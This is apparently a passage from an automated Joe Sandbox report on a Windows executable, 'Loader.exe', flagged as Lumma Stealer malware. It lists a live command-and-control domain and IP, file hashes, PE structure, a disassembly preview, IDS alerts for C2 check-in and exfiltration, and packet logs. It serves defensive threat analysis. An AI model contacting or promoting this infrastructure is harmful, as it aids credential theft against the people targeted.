                                    https://duckduckgo.com/chrome_newtabLoader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://ingreem-eilish.biz/&&Loader.exe, 00000001.00000003.2640883555.000000000146F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2641218007.0000000001476000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2640956088.0000000001474000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoLoader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://ingreem-eilish.biz/Loader.exe, 00000001.00000002.2712486611.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2567538989.000000000145D000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2712486611.0000000001457000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://crl.rootca1.amazontrust.com/rootca1.crl0Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ingreem-eilish.biz/apiCLoader.exe, 00000001.00000002.2712486611.000000000140C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://ocsp.rootca1.amazontrust.com0:Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ingreem-eilish.biz/hLoader.exe, 00000001.00000003.2690435332.0000000001475000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://www.ecosia.org/newtab/Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brLoader.exe, 00000001.00000003.2616062233.00000000039E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://ingreem-eilish.biz:443/apiKLoader.exe, 00000001.00000002.2712486611.00000000013D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://ac.ecosia.org/autocomplete?q=Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ingreem-eilish.biz:443/apiLoader.exe, 00000001.00000002.2712486611.00000000013D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://x1.c.lencr.org/0Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://x1.i.lencr.org/0Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchLoader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://support.mozilla.org/products/firefoxgro.allLoader.exe, 00000001.00000003.2616062233.00000000039E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://ingreem-eilish.biz/apiXLoader.exe, 00000001.00000002.2712836874.000000000147C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2690412895.0000000001478000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://ingreem-eilish.biz:443/apiicrosoftLoader.exe, 00000001.00000002.2712486611.00000000013D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown

                                                                                    World Map of Contacted IPs

                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs

                                                                                    Public IPs

                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    104.21.90.135
                                                                                    		ingreem-eilish.bizUnited States
                                                                                    		13335CLOUDFLARENETUStrue

                                                                                    General Information

                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1579012
                                                                                    Start date and time:2024-12-20 17:40:03 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 5m 50s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:3
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:Loader.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 88%
                                                                                    • Number of executed functions: 34
                                                                                    • Number of non-executed functions: 131
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe

                                                                                    Warnings

                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    • VT rate limit hit for: Loader.exe

                                                                                    Simulations

                                                                                    Behavior and APIs

                                                                                    TimeTypeDescription
                                                                                    11:41:44API Interceptor7x Sleep call for process: Loader.exe modified

                                                                                    Joe Sandbox View / Context

                                                                                    IPs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    104.21.90.135ryidtyjrhGet hashmaliciousUnknownBrowse

                                                                                      Domains

                                                                                      No context

                                                                                      ASNs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      CLOUDFLARENETUSSentinelled.vbsGet hashmaliciousUnknownBrowse
                                                                                      • 104.21.86.72
                                                                                      nshkarm.elfGet hashmaliciousMiraiBrowse
                                                                                      • 104.25.87.101
                                                                                      hBBxlxfQ3F.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                      • 172.67.197.170
                                                                                      gf3yK6i4OX.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.21.99
                                                                                      0WO49yZcDA.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.21.99
                                                                                      uDTW3VjJJT.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                      • 104.21.21.99
                                                                                      u1z7S3hr06.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                      • 104.21.21.99
                                                                                      zhQFKte2vX.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.197.170
                                                                                      http://www.eventcreate.com/e/you-have-received-a-new-docGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 104.17.25.14
                                                                                      ddySsHnC6l.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.197.170

                                                                                      JA3 Fingerprints

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      a0e9f5d64349fb13191bc781f81f42e1hBBxlxfQ3F.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                      • 104.21.90.135
                                                                                      gf3yK6i4OX.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.90.135
                                                                                      0WO49yZcDA.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.90.135
                                                                                      uDTW3VjJJT.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                      • 104.21.90.135
                                                                                      u1z7S3hr06.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                      • 104.21.90.135
                                                                                      zhQFKte2vX.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.90.135
                                                                                      ddySsHnC6l.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.90.135
                                                                                      NAliwxUTJ4.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.90.135
                                                                                      XNtOBQ5NHr.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                      • 104.21.90.135
                                                                                      Z8oTIWCyDE.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.90.135

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      No created / dropped files found

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):6.256587943823873
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:Loader.exe
                                                                                      File size:3'208'704 bytes
                                                                                      MD5:99604ef7ebf56a566a0cdb4b6bb0fa08
                                                                                      SHA1:f16ce4bd1ba5eba29494ff69ac8d263e2f9110b7
                                                                                      SHA256:cca815d086ab89c36262865aaa9e0dd7dc02830aec4e6a3fa8b662b65adf7ce0
                                                                                      SHA512:97a518db9a2dbeaf8c2539135fdd19fafdb0ddad2cb2f14a596587db623a971f805b4c957801fa7db05078673545eb4ee365683944d70aba507ddc899d0fe7a2
                                                                                      SSDEEP:98304:861nv8BvCX4CvockvGlOvB1gy7z/irvf1cF597EIcthe9Acv0ezr72U:861Dfof1vX/ibNcF5dhCGN
                                                                                      TLSH:0CE56BBC1000CD36CB17C1B5B2032ACF7B6D26F2D99FB022679495EAA85F6CE49485D7
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............A...A...A...@...A...@+..A...@...A.4.@...A.4.@...A.4.@...A...@...A...A...A&4.@...A&46A...A&4.@...ARich...A...............

                                                                                      File Icon

                                                                                      Icon Hash:2c361212c3aced39

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x6d4326
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x675D4DF9 [Sat Dec 14 09:20:57 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:6
                                                                                      OS Version Minor:0
                                                                                      File Version Major:6
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:6
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:e990cd25aa53852c85f149fcb0678c1e

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      call 00007F5E38B642DAh
                                                                                      jmp 00007F5E38B63D8Fh
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      push 00000000h
                                                                                      call dword ptr [006E100Ch]
                                                                                      push dword ptr [ebp+08h]
                                                                                      call dword ptr [006E1008h]
                                                                                      push C0000409h
                                                                                      call dword ptr [006E1010h]
                                                                                      push eax
                                                                                      call dword ptr [006E1014h]
                                                                                      pop ebp
                                                                                      ret
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      sub esp, 00000324h
                                                                                      push 00000017h
                                                                                      call dword ptr [006E1018h]
                                                                                      test eax, eax
                                                                                      je 00007F5E38B63F17h
                                                                                      push 00000002h
                                                                                      pop ecx
                                                                                      int 29h
                                                                                      mov dword ptr [006E7A60h], eax
                                                                                      mov dword ptr [006E7A5Ch], ecx
                                                                                      mov dword ptr [006E7A58h], edx
                                                                                      mov dword ptr [006E7A54h], ebx
                                                                                      mov dword ptr [006E7A50h], esi
                                                                                      mov dword ptr [006E7A4Ch], edi
                                                                                      mov word ptr [006E7A78h], ss
                                                                                      mov word ptr [006E7A6Ch], cs
                                                                                      mov word ptr [006E7A48h], ds
                                                                                      mov word ptr [006E7A44h], es
                                                                                      mov word ptr [006E7A40h], fs
                                                                                      mov word ptr [006E7A3Ch], gs
                                                                                      pushfd
                                                                                      pop dword ptr [006E7A70h]
                                                                                      mov eax, dword ptr [ebp+00h]
                                                                                      mov dword ptr [006E7A64h], eax
                                                                                      mov eax, dword ptr [ebp+04h]
                                                                                      mov dword ptr [006E7A68h], eax
                                                                                      lea eax, dword ptr [ebp+08h]
                                                                                      mov dword ptr [006E7A74h], eax
                                                                                      mov eax, dword ptr [ebp-00000324h]
                                                                                      mov dword ptr [006E79B0h], 00010001h

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2e68c40x28.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2e90000xfab9.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2f90000x199dc.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x2e5d800x54.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2e5cc00x40.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x2e10000x108.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x2df0920x2df200dc72ebcfb8ff7768f22fefca4be8ff49unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0x2e10000x5eb20x6000e11117728ebcbec4e2528fb736829857False0.4133707682291667data4.7342482849867356IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0x2e70000x14980xa002e3d907102a146e9652e9b10f1b5f1e4False0.18359375data2.3274080229263867IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rsrc0x2e90000xfab90xfc00cebbbcdddafd8703a3201723b53ac01dFalse0.9126519097222222data7.585610831148343IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x2f90000x199dc0x19a00fd6c7e2d41b84e2eada46eb03bb3b9d4False0.7238090701219512data6.845556888592954IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_ICON0x2e94300xd3c4PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9950564450675127
                                                                                      RT_MENU0x2f67f40x1a0data0.6177884615384616
                                                                                      RT_MENU0x2f69940x2aadata0.5630498533724341
                                                                                      RT_DIALOG0x2f6c400x2e0data0.5339673913043478
                                                                                      RT_DIALOG0x2f6f200x20cdata0.6125954198473282
                                                                                      RT_DIALOG0x2f712c0x318data0.5429292929292929
                                                                                      RT_DIALOG0x2f74440x200data0.546875
                                                                                      RT_DIALOG0x2f76440x2d0data0.5513888888888889
                                                                                      RT_STRING0x2f79140x13cdata0.6329113924050633
                                                                                      RT_STRING0x2f7a500x194data0.599009900990099
                                                                                      RT_STRING0x2f7be40x1a4data0.5833333333333334
                                                                                      RT_STRING0x2f7d880x1acdata0.5841121495327103
                                                                                      RT_STRING0x2f7f340x198data0.6151960784313726
                                                                                      RT_MESSAGETABLE0x2f80cc0x360Matlab v4 mat-file (little endian) 9\001, rows 289, columns 297, imaginary0.5057870370370371
                                                                                      RT_MESSAGETABLE0x2f842c0x1fcMatlab v4 mat-file (little endian) )\001, rows 276, columns 281, imaginary0.5551181102362205
                                                                                      RT_GROUP_ICON0x2f86280x14data1.1
                                                                                      RT_VERSION0x2f863c0x300dataEnglishUnited States0.5091145833333334
                                                                                      RT_MANIFEST0x2f893c0x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                      Imports

                                                                                      DLLImport
                                                                                      KERNEL32.dllVirtualProtect, WriteConsoleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, SetFilePointerEx, CreateFileW, CloseHandle, DecodePointer

                                                                                      Possible Origin

                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      EnglishUnited States

                                                                                      Network Behavior

                                                                                      Suricata IDS Alerts

                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2024-12-20T17:41:44.381468+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549756104.21.90.135443TCP
                                                                                      2024-12-20T17:41:45.098343+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549756104.21.90.135443TCP
                                                                                      2024-12-20T17:41:45.098343+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549756104.21.90.135443TCP
                                                                                      2024-12-20T17:41:46.378510+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549761104.21.90.135443TCP
                                                                                      2024-12-20T17:41:47.097956+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549761104.21.90.135443TCP
                                                                                      2024-12-20T17:41:47.097956+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549761104.21.90.135443TCP
                                                                                      2024-12-20T17:41:48.661686+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549767104.21.90.135443TCP
                                                                                      2024-12-20T17:41:50.819969+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549773104.21.90.135443TCP
                                                                                      2024-12-20T17:41:51.622335+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549773104.21.90.135443TCP
                                                                                      2024-12-20T17:41:53.431410+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549780104.21.90.135443TCP
                                                                                      2024-12-20T17:41:55.900795+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549786104.21.90.135443TCP
                                                                                      2024-12-20T17:41:57.871064+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549792104.21.90.135443TCP
                                                                                      2024-12-20T17:42:00.820993+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549799104.21.90.135443TCP
                                                                                      2024-12-20T17:42:01.648299+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549799104.21.90.135443TCP

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Dec 20, 2024 17:41:43.150978088 CET49756443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:43.151032925 CET44349756104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:43.151204109 CET49756443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:43.152499914 CET49756443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:43.152518034 CET44349756104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:44.381395102 CET44349756104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:44.381468058 CET49756443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:44.389568090 CET49756443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:44.389597893 CET44349756104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:44.389830112 CET44349756104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:44.437151909 CET49756443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:44.463648081 CET49756443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:44.463676929 CET49756443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:44.463778973 CET44349756104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:45.098329067 CET44349756104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:45.098433018 CET44349756104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:45.098543882 CET49756443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:45.106513023 CET49756443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:45.106543064 CET44349756104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:45.106555939 CET49756443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:45.106563091 CET44349756104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:45.154830933 CET49761443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:45.154881954 CET44349761104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:45.154966116 CET49761443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:45.155304909 CET49761443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:45.155318975 CET44349761104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:46.378355026 CET44349761104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:46.378509998 CET49761443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:46.380244017 CET49761443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:46.380255938 CET44349761104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:46.380500078 CET44349761104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:46.382421970 CET49761443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:46.382421970 CET49761443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:46.382494926 CET44349761104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:47.097956896 CET44349761104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:47.098021030 CET44349761104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:47.098093987 CET44349761104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:47.098108053 CET49761443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:47.098129034 CET44349761104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:47.098181963 CET49761443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:47.098189116 CET44349761104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:47.106517076 CET44349761104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:47.106760979 CET49761443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:47.106776953 CET44349761104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:47.115153074 CET44349761104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:47.115238905 CET49761443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:47.115251064 CET44349761104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:47.123719931 CET44349761104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:47.123791933 CET49761443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:47.123800993 CET44349761104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:47.171585083 CET49761443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:47.171601057 CET44349761104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:47.218620062 CET49761443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:47.218631983 CET44349761104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:47.265394926 CET49761443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:47.291074038 CET44349761104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:47.291187048 CET44349761104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:47.291413069 CET49761443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:47.291454077 CET49761443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:47.291471004 CET44349761104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:47.291481018 CET49761443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:47.291486979 CET44349761104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:47.444859028 CET49767443192.168.2.5104.21.90.135
